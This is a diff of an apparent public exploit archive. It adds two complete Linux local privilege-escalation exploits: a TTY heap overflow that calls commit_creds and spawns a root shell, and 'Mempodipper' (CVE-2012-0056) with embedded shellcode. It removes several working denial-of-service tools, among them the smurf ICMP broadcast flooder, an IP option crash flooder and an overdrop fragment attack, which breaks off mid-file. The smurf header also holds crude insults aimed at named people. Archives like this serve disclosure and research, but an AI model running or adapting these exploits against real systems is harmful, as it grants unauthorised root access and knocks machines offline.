+ * v2.6.31-rc3, however relevant changes to the TTY subsystem were made in
+ * commit acc0f67f307f52f7aec1cffdc40a786c15dd21d9 ("tty: Halve flip buffer
+ * GFP_ATOMIC memory consumption") that make exploitation simpler, which this
+ * exploit relies on.
+ *
+ * Thanks to Jon Oberheide for his help on exploitation technique.
+ */
+
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <pty.h>
+#include <stdio.h>
+#include <string.h>
+#include <termios.h>
+#include <unistd.h>
+
+#define TTY_MAGIC 0x5401
+
+#define ONEOFF_ALLOCS 200
+#define RUN_ALLOCS    30
+
+struct device;
+struct tty_driver;
+struct tty_operations;
+
+typedef struct {
+	int counter;
+} atomic_t;
+
+struct kref {
+	atomic_t refcount;
+};
+
+struct tty_struct_header {
+	int	magic;
+	struct kref kref;
+	struct device *dev;
+	struct tty_driver *driver;
+	const struct tty_operations *ops;
+} overwrite;
+
+typedef int __attribute__((regparm(3))) (* commit_creds_fn)(unsigned long cred);
+typedef unsigned long __attribute__((regparm(3))) (* prepare_kernel_cred_fn)(unsigned long cred);
+
+int master_fd, slave_fd;
+char buf[1024] = {0};
+commit_creds_fn commit_creds;
+prepare_kernel_cred_fn prepare_kernel_cred;
+
+int payload(void) {
+	commit_creds(prepare_kernel_cred(0));
+
+	return 0;
+}
+
+unsigned long get_symbol(char *target_name) {
+	FILE *f;
+	unsigned long addr;
+	char dummy;
+	char name[256];
+	int ret = 0;
+
+	f = fopen("/proc/kallsyms", "r");
+	if (f == NULL)
+		return 0;
+
+	while (ret != EOF) {
+		ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, name);
+		if (ret == 0) {
+			fscanf(f, "%s\n", name);
+			continue;
+		}
+
+		if (!strcmp(name, target_name)) {
+			printf("[+] Resolved %s: %p\n", target_name, (void *)addr);
+
+			fclose(f);
+			return addr;
+		}
+	}
+
+	printf("[-] Couldn't resolve \"%s\"\n", name);
+
+	fclose(f);
+	return 0;
+}
+
+void *overwrite_thread_fn(void *p) {
+	write(slave_fd, buf, 511);
+
+	write(slave_fd, buf, 1024 - 32 - (1 + 511 + 1));
+	write(slave_fd, &overwrite, sizeof(overwrite));
+}
+
+int main() {
+	char scratch[1024] = {0};
+	void *tty_operations[64];
+	int i, temp_fd_1, temp_fd_2;
+
+	for (i = 0; i < 64; ++i)
+		tty_operations[i] = payload;
+
+	overwrite.magic                 = TTY_MAGIC;
+	overwrite.kref.refcount.counter = 0x1337;
+	overwrite.dev                   = (struct device *)scratch;
+	overwrite.driver                = (struct tty_driver *)scratch;
+	overwrite.ops                   = (struct tty_operations *)tty_operations;
+
+	puts("[+] Resolving symbols");
+
+	commit_creds = (commit_creds_fn)get_symbol("commit_creds");
+	prepare_kernel_cred = (prepare_kernel_cred_fn)get_symbol("prepare_kernel_cred");
+	if (!commit_creds || !prepare_kernel_cred)
+		return 1;
+
+	puts("[+] Doing once-off allocations");
+
+	for (i = 0; i < ONEOFF_ALLOCS; ++i)
+		if (openpty(&temp_fd_1, &temp_fd_2, NULL, NULL, NULL) == -1) {
+			puts("[-] pty creation failed");
+			return 1;
+		}
+
+	printf("[+] Attempting to overflow into a tty_struct...");
+	fflush(stdout);
+
+	for (i = 0; ; ++i) {
+		struct termios t;
+		int fds[RUN_ALLOCS], fds2[RUN_ALLOCS], j;
+		pthread_t overwrite_thread;
+
+		if (!(i & 0xfff)) {
+			putchar('.');
+			fflush(stdout);
+		}
+
+		if (openpty(&master_fd, &slave_fd, NULL, NULL, NULL) == -1) {
+			puts("\n[-] pty creation failed");
+			return 1;
+		}
+
+		for (j = 0; j < RUN_ALLOCS; ++j)
+			if (openpty(&fds[j], &fds2[j], NULL, NULL, NULL) == -1) {
+				puts("\n[-] pty creation failed");
+				return 1;
+			}
+
+		close(fds[RUN_ALLOCS / 2]);
+		close(fds2[RUN_ALLOCS / 2]);
+
+		write(slave_fd, buf, 1);
+
+		tcgetattr(master_fd, &t);
+		t.c_oflag &= ~OPOST;
+		t.c_lflag |= ECHO;
+		tcsetattr(master_fd, TCSANOW, &t);
+
+		if (pthread_create(&overwrite_thread, NULL, overwrite_thread_fn, NULL)) {
+			puts("\n[-] Overwrite thread creation failed");
+			return 1;
+		}
+		write(master_fd, "A", 1);
+		pthread_join(overwrite_thread, NULL);
+
+		for (j = 0; j < RUN_ALLOCS; ++j) {
+			if (j == RUN_ALLOCS / 2)
+				continue;
+
+			ioctl(fds[j], 0xdeadbeef);
+			ioctl(fds2[j], 0xdeadbeef);
+
+			close(fds[j]);
+			close(fds2[j]);
+		}
+
+		ioctl(master_fd, 0xdeadbeef);
+		ioctl(slave_fd, 0xdeadbeef);
+
+		close(master_fd);
+		close(slave_fd);
+
+		if (!setresuid(0, 0, 0)) {
+			setresgid(0, 0, 0);
+
+			puts("\n[+] Got it :)");
+			execl("/bin/bash", "/bin/bash", NULL);
+		}
+	}
+}
--- a/platforms/linux/local/34001.c
+++ b/platforms/linux/local/34001.c
@ -1,8 +1,10 @@
+/*
 source: http://www.securityfocus.com/bid/40241/info

 The Linux Kernel is prone to a security-bypass vulnerability that affects the Btrfs filesystem implementation.

 An attacker can exploit this issue to clone a file only open for writing. This may allow attackers to obtain sensitive data or launch further attacks. 
+*/

 #include <fcntl.h>
 #include <sys/ioctl.h>
--- a/platforms/linux/local/35161.c
+++ b/platforms/linux/local/35161.c
@ -0,0 +1,292 @@
+/*
+Exploit code is here: http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
+Blog post about it is here: http://blog.zx2c4.com/749
+*/
+
+/*
+ * Mempodipper
+ * by zx2c4
+ * 
+ * Linux Local Root Exploit
+ * 
+ * Rather than put my write up here, per usual, this time I've put it
+ * in a rather lengthy blog post: http://blog.zx2c4.com/749
+ * 
+ * Enjoy.
+ * 
+ * - zx2c4
+ * Jan 21, 2012
+ * 
+ * CVE-2012-0056
+ */
+
+#define _LARGEFILE64_SOURCE
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <sys/wait.h>
+#include <sys/types.h>
+#include <sys/user.h>
+#include <sys/ptrace.h>
+#include <sys/reg.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <limits.h>
+
+char *prog_name;
+
+int send_fd(int sock, int fd)
+{
+	char buf[1];
+	struct iovec iov;
+	struct msghdr msg;
+	struct cmsghdr *cmsg;
+	int n;
+	char cms[CMSG_SPACE(sizeof(int))];
+
+	buf[0] = 0;
+	iov.iov_base = buf;
+	iov.iov_len = 1;
+
+	memset(&msg, 0, sizeof msg);
+	msg.msg_iov = &iov;
+	msg.msg_iovlen = 1;
+	msg.msg_control = (caddr_t)cms;
+	msg.msg_controllen = CMSG_LEN(sizeof(int));
+
+	cmsg = CMSG_FIRSTHDR(&msg);
+	cmsg->cmsg_len = CMSG_LEN(sizeof(int));
+	cmsg->cmsg_level = SOL_SOCKET;
+	cmsg->cmsg_type = SCM_RIGHTS;
+	memmove(CMSG_DATA(cmsg), &fd, sizeof(int));
+
+	if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len)
+		return -1;
+	close(sock);
+	return 0;
+}
+
+int recv_fd(int sock)
+{
+	int n;
+	int fd;
+	char buf[1];
+	struct iovec iov;
+	struct msghdr msg;
+	struct cmsghdr *cmsg;
+	char cms[CMSG_SPACE(sizeof(int))];
+	
+	iov.iov_base = buf;
+	iov.iov_len = 1;
+
+	memset(&msg, 0, sizeof msg);
+	msg.msg_name = 0;
+	msg.msg_namelen = 0;
+	msg.msg_iov = &iov;
+	msg.msg_iovlen = 1;
+
+	msg.msg_control = (caddr_t)cms;
+	msg.msg_controllen = sizeof cms;
+
+	if ((n = recvmsg(sock, &msg, 0)) < 0)
+		return -1;
+	if (n == 0)
+		return -1;
+	cmsg = CMSG_FIRSTHDR(&msg);
+	memmove(&fd, CMSG_DATA(cmsg), sizeof(int));
+	close(sock);
+	return fd;
+}
+
+unsigned long ptrace_address()
+{
+	int fd[2];
+	printf("[+] Creating ptrace pipe.\n");
+	pipe(fd);
+	fcntl(fd[0], F_SETFL, O_NONBLOCK);
+
+	printf("[+] Forking ptrace child.\n");
+	int child = fork();
+	if (child) {
+		close(fd[1]);
+		char buf;
+		printf("[+] Waiting for ptraced child to give output on syscalls.\n");
+		for (;;) {
+			wait(NULL);
+			if (read(fd[0], &buf, 1) > 0)
+				break;
+			ptrace(PTRACE_SYSCALL, child, NULL, NULL);
+		}
+		
+		printf("[+] Error message written. Single stepping to find address.\n");
+		struct user_regs_struct regs;
+		for (;;) {
+			ptrace(PTRACE_SINGLESTEP, child, NULL, NULL);
+			wait(NULL);
+			ptrace(PTRACE_GETREGS, child, NULL, &regs);
+#if defined(__i386__)
+#define instruction_pointer regs.eip
+#define upper_bound 0xb0000000
+#elif defined(__x86_64__)
+#define instruction_pointer regs.rip
+#define upper_bound 0x700000000000
+#else
+#error "That platform is not supported."
+#endif
+			if (instruction_pointer < upper_bound) {
+				unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
+				if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */)
+					return instruction_pointer;
+			}
+		}
+	} else {
+		printf("[+] Ptrace_traceme'ing process.\n");
+		if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) < 0) {
+			perror("[-] ptrace");
+			return 0;
+		}
+		close(fd[0]);
+		dup2(fd[1], 2);
+		execl("/bin/su", "su", "not-a-valid-user", NULL);
+	}
+	return 0;
+}
+
+unsigned long objdump_address()
+{
+	FILE *command = popen("objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", "r");
+	if (!command) {
+		perror("[-] popen");
+		return 0;
+	}
+	char result[32];
+	fgets(result, 32, command);
+	pclose(command);
+	return strtoul(result, NULL, 16);
+}
+
+unsigned long find_address()
+{
+	printf("[+] Ptracing su to find next instruction without reading binary.\n");
+	unsigned long address = ptrace_address();
+	if (!address) {
+		printf("[-] Ptrace failed.\n");
+		printf("[+] Reading su binary with objdump to find exit@plt.\n");
+		address = objdump_address();
+		if (address == ULONG_MAX || !address) {
+			printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n");
+			printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", prog_name, prog_name);
+			exit(-1);
+		}
+	}
+	printf("[+] Resolved call address to 0x%lx.\n", address);
+	return address;
+}
+
+int su_padding()
+{
+	printf("[+] Calculating su padding.\n");
+	FILE *command = popen("/bin/su this-user-does-not-exist 2>&1", "r");
+	if (!command) {
+		perror("[-] popen");
+		exit(1);
+	}
+	char result[256];
+	fgets(result, 256, command);
+	pclose(command);
+	return strstr(result, "this-user-does-not-exist") - result;
+}
+
+int child(int sock)
+{
+	char parent_mem[256];
+	sprintf(parent_mem, "/proc/%d/mem", getppid());
+	printf("[+] Opening parent mem %s in child.\n", parent_mem);
+	int fd = open(parent_mem, O_RDWR);
+	if (fd < 0) {
+		perror("[-] open");
+		return 1;
+	}
+	printf("[+] Sending fd %d to parent.\n", fd);
+	send_fd(sock, fd);
+	return 0;
+}
+
+int parent(unsigned long address)
+{
+	int sockets[2];
+	printf("[+] Opening socketpair.\n");
+	if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockets) < 0) {
+		perror("[-] socketpair");
+		return 1;
+	}
+	if (fork()) {
+		printf("[+] Waiting for transferred fd in parent.\n");
+		int fd = recv_fd(sockets[1]);
+		printf("[+] Received fd at %d.\n", fd);
+		if (fd < 0) {
+			perror("[-] recv_fd");
+			return 1;
+		}
+		printf("[+] Assigning fd %d to stderr.\n", fd);
+		dup2(2, 15);
+		dup2(fd, 2);
+
+		unsigned long offset = address - su_padding();
+		printf("[+] Seeking to offset 0x%lx.\n", offset);
+		lseek64(fd, offset, SEEK_SET);
+		
+#if defined(__i386__)
+		// See shellcode-32.s in this package for the source.
+		char shellcode[] =
+			"\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"
+			"\x0f\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"
+			"\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"
+			"\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
+			"\x80";
+#elif defined(__x86_64__)
+		// See shellcode-64.s in this package for the source.
+		char shellcode[] =
+			"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x48"
+			"\x31\xf6\x40\xb7\x0f\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f"
+			"\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7"
+			"\x48\x31\xdb\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50"
+			"\x51\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
+#else
+#error "That platform is not supported."
+#endif
+		printf("[+] Executing su with shellcode.\n");
+		execl("/bin/su", "su", shellcode, NULL);
+	} else {
+		char sock[32];
+		sprintf(sock, "%d", sockets[0]);
+		printf("[+] Executing child from child fork.\n");
+		execl("/proc/self/exe", prog_name, "-c", sock, NULL);
+	}
+	return 0;
+}
+
+int main(int argc, char **argv)
+{
+	prog_name = argv[0];
+	
+	if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c')
+		return child(atoi(argv[2]));
+	
+	printf("===============================\n");
+	printf("=          Mempodipper        =\n");
+	printf("=           by zx2c4          =\n");
+	printf("=         Jan 21, 2012        =\n");
+	printf("===============================\n\n");
+	
+	if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o')
+		return parent(strtoul(argv[2], NULL, 16));
+	else
+		return parent(find_address());
+	
+}
--- a/platforms/linux/local/38465.txt
+++ b/platforms/linux/local/38465.txt
@ -1,8 +0,0 @@
-source: http://www.securityfocus.com/bid/59055/info
-
-The Linux kernel is prone to multiple local denial-of-service vulnerabilities.
-
-Attackers can exploit these issues to trigger a kernel crash, which may result in a denial-of-service condition. 
-
-cd /sys/kernel/debug/tracing
-echo 1234 | sudo tee -a set_ftrace_pid 
--- a/platforms/linux/remote/19117.c
+++ b/platforms/linux/remote/19117.c
@ -1,230 +0,0 @@
-source: http://www.securityfocus.com/bid/147/info
-
-The "Smurf" denial of service exploits the existance, and forwarding of, packets sent to IP broadcast addreses. By creating an ICMP echo request packet, with the source address set to an IP within the network to be attacked, and the destination address the IP broadcast address of a network which will forward and respond to ICMP echo packets sent to broadcast. Each packet sent in to the network being used to conduct the attack will be responded to by any machine which will respond to ICMP on the broadcast address. Therefore, a single packet can result in an overwhelming response count, all of which are directed to the network the attacker has forged as the source. This can result in significant bandwidth loss.
-
-/*
- *
- *  $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $
- *
- *  spoofs icmp packets from a host to various broadcast addresses resulting
- *  in multiple replies to that host from a single packet.
- *
- *  mad head to:
- *     nyt, soldier, autopsy, legendnet, #c0de, irq for being my guinea pig,
- *     MissSatan for swallowing, napster for pimping my sister, the guy that
- *     invented vaseline, fyber for trying, knowy, old school #havok, kain
- *     cos he rox my sox, zuez, toxik, robocod, and everyone else that i might
- *     have missed (you know who you are).
- *
- *     hi to pbug, majikal, white_dragon and chris@unix.org for being the sexy
- *     thing he is (he's -almost- as stubborn as me, still i managed to pick up
- *     half the cheque).
- *
- *     and a special hi to Todd, face it dude, you're fucking awesome.
- *
- *  mad anal to:
- *     #madcrew/#conflict for not cashing in their cluepons, EFnet IRCOps
- *     because they plain suck, Rolex for being a twit, everyone that
- *     trades warez, Caren for being a lesbian hoe, AcidKill for being her
- *     partner, #cha0s, sedriss for having an ego in inverse proportion to
- *     his penis and anyone that can't pee standing up -- you don't know what
- *     your missing out on.
- *
- *     and anyone thats ripped my code (diff smurf.c axcast.c is rather
- *     interesting).
- *
- *     and a HUGE TWICE THE SIZE OF SOLDIER'S FUCK TO AMM FUCK YOU to Bill
- *     Robbins for trying to steal my girlfriend.  Not only did you show me
- *     no respect but you're a manipulating prick who tried to take away the
- *     most important thing in the world to me with no guilt whatsoever, and
- *     for that I wish you nothing but pain.  Die.
- *
- *  disclaimer:
- *     I cannot and will not be held responsible nor legally bound for the
- *     malicious activities of individuals who come into possession of this
- *     program and I refuse to provide help or support of any kind and do NOT
- *     condone use of this program to deny service to anyone or any machine.
- *     This is for educational use only. Please Don't abuse this.
- *
- *  Well, i really, really, hate this code, but yet here I am creating another
- *  disgusting version of it.  Odd, indeed.  So why did I write it?  Well, I,
- *  like most programmers don't like seeing bugs in their code.  I saw a few
- *  things that should have been done better or needed fixing so I fixed
- *  them.  -shrug-, programming for me as always seemed to take the pain away
- *  ...
- *
- *
- */
-
-#include <signal.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <sys/socket.h>
-#include <sys/types.h>
-#include <netinet/in.h>
-#include <netinet/ip.h>
-#include <netinet/ip_icmp.h>
-#include <netdb.h>
-#include <ctype.h>
-#include <arpa/inet.h>
-#include <unistd.h>
-#include <string.h>
-
-void banner(void);
-void usage(char *);
-void smurf(int, struct sockaddr_in, u_long, int);
-void ctrlc(int);
-unsigned short in_chksum(u_short *, int);
-
-/* stamp */
-char id[] = "$Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $";
-
-int main (int argc, char *argv[])
-{
-   struct sockaddr_in sin;
-   struct hostent *he;
-   FILE   *bcastfile;
-   int    i, sock, bcast, delay, num, pktsize, cycle = 0, x;
-   char   buf[32], **bcastaddr = malloc(8192);
-
-   banner();
-   signal(SIGINT, ctrlc);
-
-   if (argc < 6) usage(argv[0]);
-
-   if ((he = gethostbyname(argv[1])) == NULL) {
-      perror("resolving source host");
-      exit(-1);
-   }
-   memcpy((caddr_t)&sin.sin_addr, he->h_addr, he->h_length);
-   sin.sin_family = AF_INET;
-   sin.sin_port = htons(0);
-
-   num = atoi(argv[3]);
-   delay = atoi(argv[4]);
-   pktsize = atoi(argv[5]);
-
-   if ((bcastfile = fopen(argv[2], "r")) == NULL) {
-      perror("opening bcast file");
-      exit(-1);
-   }
-   x = 0;
-   while (!feof(bcastfile)) {
-      fgets(buf, 32, bcastfile);
-      if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0])) continue;
-      for (i = 0; i < strlen(buf); i++)
-          if (buf[i] == '\n') buf[i] = '\0';
-      bcastaddr[x] = malloc(32);
-      strcpy(bcastaddr[x], buf);
-      x++;
-   }
-   bcastaddr[x] = 0x0;
-   fclose(bcastfile);
-
-   if (x == 0) {
-      fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]);
-      exit(-1);
-   }
-   if (pktsize > 1024) {
-      fprintf(stderr, "ERROR: packet size must be < 1024\n\n");
-      exit(-1);
-   }
-
-   if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
-      perror("getting socket");
-      exit(-1);
-   }
-   setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *)&bcast, sizeof(bcast));
-
-   printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]);
-
-   for (i = 0; i < num || !num; i++) {
-      if (!(i % 25)) { printf("."); fflush(stdout); }
-      smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize);
-      cycle++;
-      if (bcastaddr[cycle] == 0x0) cycle = 0;
-      usleep(delay);
-   }
-   puts("\n\n");
-   return 0;
-}
-
-void banner (void)
-{
-   puts("\nsmurf.c v4.0 by TFreak\n");
-}
-
-void usage (char *prog)
-{
-   fprintf(stderr, "usage: %s <target> <bcast file> "
-                   "<num packets> <packet delay> <packet size>
-\n\n"
-                   "target        = address to hit\n"
-                   "bcast file    = file to read broadcast addresses from\n"
-                   "num packets   = number of packets to send (0 = flood)\n"
-                   "packet delay  = wait between each packet (in ms)\n"
-                   "packet size   = size of packet (< 1024)\n\n", prog);
-   exit(-1);
-}
-
-void smurf (int sock, struct sockaddr_in sin, u_long dest, int psize)
-{
-   struct iphdr *ip;
-   struct icmphdr *icmp;
-   char *packet;
-
-   packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
-   ip = (struct iphdr *)packet;
-   icmp = (struct icmphdr *) (packet + sizeof(struct iphdr));
-
-   memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
-
-   ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize)
-;
-   ip->ihl = 5;
-   ip->version = 4;
-   ip->ttl = 255;
-   ip->tos = 0;
-   ip->frag_off = 0;
-   ip->protocol = IPPROTO_ICMP;
-   ip->saddr = sin.sin_addr.s_addr;
-   ip->daddr = dest;
-   ip->check = in_chksum((u_short *)ip, sizeof(struct iphdr));
-   icmp->type = 8;
-   icmp->code = 0;
-   icmp->checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psize
-);
-
-   sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize,
-          0, (struct sockaddr *)&sin, sizeof(struct sockaddr));
-
-   free(packet);           /* free willy! */
-}
-
-void ctrlc (int ignored)
-{
-   puts("\nDone!\n");
-   exit(1);
-}
-
-unsigned short in_chksum (u_short *addr, int len)
-{
-   register int nleft = len;
-   register int sum = 0;
-   u_short answer = 0;
-
-   while (nleft > 1) {
-      sum += *addr++;
-      nleft -= 2;
-   }
-
-   if (nleft == 1) {
-      *(u_char *)(&answer) = *(u_char *)addr;
-      sum += answer;
-   }
-
-   sum = (sum >> 16) + (sum + 0xffff);
-   sum += (sum >> 16);
-   answer = ~sum;
-   return(answer);
-}
--- a/platforms/linux/remote/19241.c
+++ b/platforms/linux/remote/19241.c
@ -1,122 +0,0 @@
-source: http://www.securityfocus.com/bid/302/info
-
-A vulnerability in the Linux Kernel's IPv4 option processing may allow a remote user to crash the system.
-
-The vulnerability is the result of the kernel freeing a socket buffer when it shouldn't while sending an ICMP Parameter Problem error message in response to an IP packet with a malformed IP option. This results in the buffer being freed twice and in memory corruption.
-
-Of the Debian Linux 2.1 supported architectures only the SPARC one is vulnerable. 
-
-#include <stdio.h>
-#include <stdlib.h>
-#include <string.h>
-#include <sys/types.h>
-#include <sys/socket.h>
-#include <netinet/in.h>
-#include <netinet/ip.h>
-#include <netinet/ip_icmp.h>
-#include <arpa/inet.h>
-#include <errno.h>
-#include <unistd.h>
-#include <netdb.h>
-
-struct icmp_hdr
-{
-    struct iphdr iph;
-    struct icmp icp;
-    char text[1002];
-} icmph;
-
-int in_cksum(int *ptr, int nbytes)
-{
-    long sum;
-    u_short oddbyte, answer;
-    sum = 0;
-    while (nbytes > 1)
-    {
-        sum += *ptr++;
-        nbytes -= 2;
-    }
-    if (nbytes == 1)
-    {
-        oddbyte = 0;
-        *((u_char *)&oddbyte) = *(u_char *)ptr;
-        sum += oddbyte;
-    }
-    sum = (sum >> 16) + (sum & 0xffff);
-    sum += (sum >> 16);
-    answer = ~sum;
-    return(answer);
-}
-
-struct sockaddr_in sock_open(char *address, int socket, int prt)
-{
-        struct hostent *host;
-        if ((host = gethostbyname(address)) == NULL)
-        {
-                perror("Unable to get host name");
-                exit(-1);
-        }       
-        struct sockaddr_in sin;
-        bzero((char *)&sin, sizeof(sin));
-        sin.sin_family = PF_INET;
-        sin.sin_port = htons(prt);
-        bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length);
-        return(sin);
-}
- 
-void main(int argc, char **argv)
-{
-        int sock, i, ctr, k;
-        int on = 1;
-        struct sockaddr_in addrs;
-        if (argc < 3)
-        {
-                printf("Usage: %s <ip_addr> <port>\n", argv[0]);
-                exit(-1);
-        }   
-        for (i = 0; i < 1002; i++)
-        {
-            icmph.text[i] = random() % 255;
-        }
-        sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
-        if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
-        {
-            perror("Can't set IP_HDRINCL option on socket");
-        }
-        if (sock < 0)
-        {
-            exit(-1);
-        }
-        fflush(stdout);
-        for (ctr = 0;ctr < 1001;ctr++)
-        {
-            ctr = ctr % 1000;
-            addrs = sock_open(argv[1], sock, atoi(argv[2]));
-            icmph.iph.version = 4;
-            icmph.iph.ihl = 6;
-            icmph.iph.tot_len = 1024;
-            icmph.iph.id = htons(0x001);
-            icmph.iph.ttl = 255;
-            icmph.iph.protocol = IPPROTO_ICMP;
-            icmph.iph.saddr = ((random() % 255) * 255 * 255 * 255) +
-            ((random() % 255) * 65535) + 
-            ((random() % 255) * 255) +
-            (random() % 255);
-            icmph.iph.daddr = addrs.sin_addr.s_addr;
-            icmph.iph.frag_off = htons(0);
-            icmph.icp.icmp_type = random() % 14;
-            icmph.icp.icmp_code = random() % 10;
-            icmph.icp.icmp_cksum = 0;
-            icmph.icp.icmp_id = 2650;
-            icmph.icp.icmp_seq = random() % 255;
-            icmph.icp.icmp_cksum = in_cksum((int *)&icmph.icp, 1024);
-            if (sendto(sock, &icmph, 1024, 0, (struct sockaddr *)&addrs,sizeof(struct sockaddr)) == -1)
-            {
-                if (errno != ENOBUFS) printf("X");
-            }
-            if (ctr == 0) printf("b00m ");
-            fflush(stdout);
-        }
-        close(sock);
-} 
-
--- a/platforms/linux/remote/19301.c
+++ b/platforms/linux/remote/19301.c
@ -1,152 +0,0 @@
-source: http://www.securityfocus.com/bid/376/info
-
-Linux kernel 2.0.33 is vulnerable to a denial of service attack related to overlapping IP fragments. The bug is not in the handling of them itself, but the action taken when an oversized packet is recieved. A printk function is called containing a variable without any sort of wrapping or protection in function ip_glue. The consequences of this are a serious remote denial of service [ie, reboot of machine].
-
-
-// overdrop by lcamtuf [Linux 2.0.33 printk abuse]
-// ------------------------------------------------
-// based on (reaped from) teardrop by route|daemon9
-
-    #include <stdio.h> 
-    #include <stdlib.h>
-    #include <unistd.h>
-    #include <string.h>
-    #include <netdb.h>
-    #include <netinet/in.h>
-    #include <netinet/udp.h>
-    #include <arpa/inet.h>
-    #include <sys/types.h>
-    #include <sys/time.h>
-    #include <sys/socket.h>
-
-    #define IP_MF   0x2000
-    #define IPH     0x14
-    #define UDPH    0x8
-    #define PADDING 0x1c
-    #define MAGIC   0x3
-    #define COUNT   0xBEEF
-    #define FRAG2   0xFFFF
-
-void usage(char *name) {
-      fprintf(stderr,"%s dst_ip [ -n how_many ] [ -s src_ip ]\n",name);
-      exit(0);
-}
-
-u_long name_resolve(char *host_name) {
-      struct in_addr addr;
-      struct hostent *host_ent;
-      if ((addr.s_addr=inet_addr(host_name))==-1) {
-        if (!(host_ent=gethostbyname(host_name))) return (0);
-        bcopy(host_ent->h_addr,(char *)&addr.s_addr,host_ent->h_length);
-      }
-      return (addr.s_addr);
-}
-
-
-void send_frags(int sock,u_long src_ip,u_long dst_ip,u_short src_prt,u_short dst_prt) {
-      u_char *packet=NULL,*p_ptr=NULL;
-      u_char byte;
-      struct sockaddr_in sin;
-      sin.sin_family=AF_INET;
-      sin.sin_port=src_prt;
-      sin.sin_addr.s_addr=dst_ip;
-      packet=(u_char *)malloc(IPH+UDPH+PADDING);
-      p_ptr=packet;
-      bzero((u_char *)p_ptr,IPH+UDPH+PADDING);
-      byte=0x45;
-      memcpy(p_ptr,&byte,sizeof(u_char));
-      p_ptr+=2;
-      *((u_short *)p_ptr)=htons(IPH+UDPH+PADDING);
-      p_ptr+=2;
-      *((u_short *)p_ptr)=htons(242);
-      p_ptr+=2;
-      *((u_short *)p_ptr)|=htons(IP_MF);
-      p_ptr+=2;
-      *((u_short *)p_ptr)=0x40;
-      byte=IPPROTO_UDP;
-      memcpy(p_ptr+1,&byte,sizeof(u_char));
-      p_ptr+=4;
-      *((u_long *)p_ptr)=src_ip;
-      p_ptr+=4;
-      *((u_long *)p_ptr)=dst_ip;
-      p_ptr+=4;
-      *((u_short *)p_ptr)=htons(src_prt);
-      p_ptr+=2;
-      *((u_short *)p_ptr)=htons(dst_prt);
-      p_ptr+=2;
-      *((u_short *)p_ptr)=htons(8+PADDING);
-      if (sendto(sock,packet,IPH+UDPH+PADDING,0,(struct sockaddr *)&sin,
-		 sizeof(struct sockaddr))==-1) {
-        perror("\nsendto");
-        free(packet);
-        exit(1);
-      }
-      p_ptr=&packet[2];
-      *((u_short *)p_ptr)=htons(IPH+MAGIC+1);
-      p_ptr+=4;
-      *((u_short *)p_ptr)=htons(FRAG2);
-      if (sendto(sock,packet,IPH+MAGIC+1,0,(struct sockaddr *)&sin,
-		 sizeof(struct sockaddr))==-1) {
-        perror("\nsendto");
-        free(packet);
-        exit(1);
-      }
-      free(packet);
-}
-
-
-int main(int argc, char **argv) {
-      int one=1,count=0,i,rip_sock;
-      u_long  src_ip=0,dst_ip=0;
-      u_short src_prt=0,dst_prt=0;
-      struct in_addr addr;
-      fprintf(stderr,"overdrop by lcamtuf [based on teardrop by route|daemon9]\n\n");
-      if((rip_sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0) {
-        perror("raw socket");
-        exit(1);
-      }
-      if (setsockopt(rip_sock,IPPROTO_IP,IP_HDRINCL,(char *)&one,sizeof(one))<0) {
-        perror("IP_HDRINCL");
-        exit(1);
-      }
-      if (argc < 2) usage(argv[0]);
-      if (!(dst_ip=name_resolve(argv[1]))) {
-        fprintf(stderr,"Can't resolve destination address.\n");
-        exit(1);
-      }
-      while ((i=getopt(argc,argv,"s:n:"))!=EOF) {
-        switch (i) {
-	case 'n':
-            count   = atoi(optarg);
-            break;
-	case 's':
-	  if (!(src_ip=name_resolve(optarg))) {
